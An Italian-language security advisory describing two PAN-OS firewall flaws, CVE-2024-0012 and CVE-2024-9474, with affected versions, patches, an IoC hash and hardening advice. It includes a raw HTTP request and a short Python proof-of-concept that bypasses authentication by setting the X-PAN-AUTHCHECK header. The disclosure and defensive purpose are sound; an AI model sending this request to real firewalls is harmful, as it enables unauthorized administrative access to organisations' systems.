Vulnerabilità Critiche nei Firewall Palo Alto Networks: CVE-2024-0012 e CVE-2024-9474

Recentemente, sono emerse due vulnerabilità critiche che colpiscono i firewall Palo Alto Networks con sistema operativo PAN-OS, segnalate come CVE-2024-0012 e CVE-2024-9474. Questi problemi di sicurezza hanno destato preoccupazione a causa della loro gravità e dell’impatto potenziale su organizzazioni che utilizzano questi dispositivi, tra cui settori governativi, finanziari e infrastrutture critiche.

Dettagli delle Vulnerabilità

CVE-2024-0012 (Punteggio CVSS: 9.3 – Critico)

Si tratta di una vulnerabilità di bypass dell’autenticazione che consente a un attaccante remoto non autenticato di ottenere privilegi amministrativi. Il problema è legato al file uiEnvSetup.php, che verifica l’intestazione HTTP X-PAN-AUTHCHECK. Manipolando questa intestazione, un attaccante può eludere la richiesta di login e accedere a risorse sensibili.

Esempio di exploit: Un attaccante potrebbe inviare una richiesta HTTP malformata simile alla seguente:

vbnetCopia codiceGET /php/ztp_gate.php/.js.map HTTP/1.1
Host: [indirizzo_target]
X-PAN-AUTHCHECK: off

Questa tecnica consente di accedere senza autenticazione a script critici del sistema.

CVE-2024-9474 (Punteggio CVSS: 6.9 – Medio)

Questa vulnerabilità è di escalation dei privilegi e consente a un utente autenticato di eseguire comandi arbitrari con privilegi di root. È legata al file createRemoteAppwebSession.php, che permette la creazione di utenti con privilegi arbitrari e l’esecuzione di codice malevolo.

Le due vulnerabilità, se combinate, consentono a un attaccante di ottenere il controllo completo del sistema, aumentando notevolmente il rischio per le infrastrutture colpite.

Versioni Vulnerabili e Mitigazioni

Le vulnerabilità interessano le seguenti versioni di PAN-OS:

Versione PAN-OSStato VulnerabilitàVersione Corretta
11.2Vulnerabile11.2.4-h1 e successivi
11.1Vulnerabile11.1.5-h1 e successivi
11.0Vulnerabile11.0.6-h1 e successivi
10.2Vulnerabile10.2.12-h2 e successivi

Si consiglia di aggiornare immediatamente i sistemi interessati. Inoltre, è fondamentale limitare l’esposizione delle interfacce di gestione dei firewall a Internet e seguire le linee guida di Palo Alto Networks per una configurazione sicura.

Indicatori di Compromissione e Metodologie di Attacco

Gli indicatori di compromissione (IoC) includono indirizzi IP malevoli e hash SHA256 di payload utilizzati per sfruttare i sistemi compromessi. Un esempio di payload è un webshell PHP caricato tramite un attacco:

Hash SHA256 del payload: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668

Possibile Proof of Concept (PoC)

Ecco un esempio di PoC Python per sfruttare CVE-2024-0012, utile a scopo di testing per gli amministratori di sistema. Questo script invia una richiesta HTTP manipolata per bypassare l’autenticazione.

pythonCopia codiceimport requests

# Configurazione del target
target_url = "http://[indirizzo_target]/php/ztp_gate.php/.js.map"
headers = {
    "X-PAN-AUTHCHECK": "off"
}

# Invio della richiesta
try:
    response = requests.get(target_url, headers=headers)
    if response.status_code == 200:
        print("[SUCCESSO] Accesso non autenticato ottenuto!")
        print(response.text)
    else:
        print(f"[ERRORE] Risposta del server: {response.status_code}")
except Exception as e:
    print(f"[ERRORE] Impossibile connettersi al target: {e}")

Nota: Questo script è fornito solo a scopo educativo e di testing autorizzato. L’uso non autorizzato può essere illegale.

Raccomandazioni

  1. Aggiornamenti di sicurezza: Installare immediatamente le versioni patchate di PAN-OS.
  2. Limitare l’accesso: Configurare regole firewall per limitare l’accesso alle interfacce di gestione a IP autorizzati.
  3. Monitoraggio costante: Implementare sistemi di rilevamento intrusioni (IDS) per identificare attività sospette.
  4. Simulazioni di attacco: Utilizzare piattaforme come Picus Security per simulare exploit e verificare l’efficacia delle difese.

Conclusioni

Le vulnerabilità CVE-2024-0012 e CVE-2024-9474 rappresentano un rischio significativo per le infrastrutture basate su Palo Alto Networks. La combinazione delle due vulnerabilità consente un’escalation rapida, che potrebbe portare a compromissioni estese. Seguire rigorosamente le pratiche di sicurezza consigliate e applicare le patch disponibili è cruciale per mitigare i rischi associati.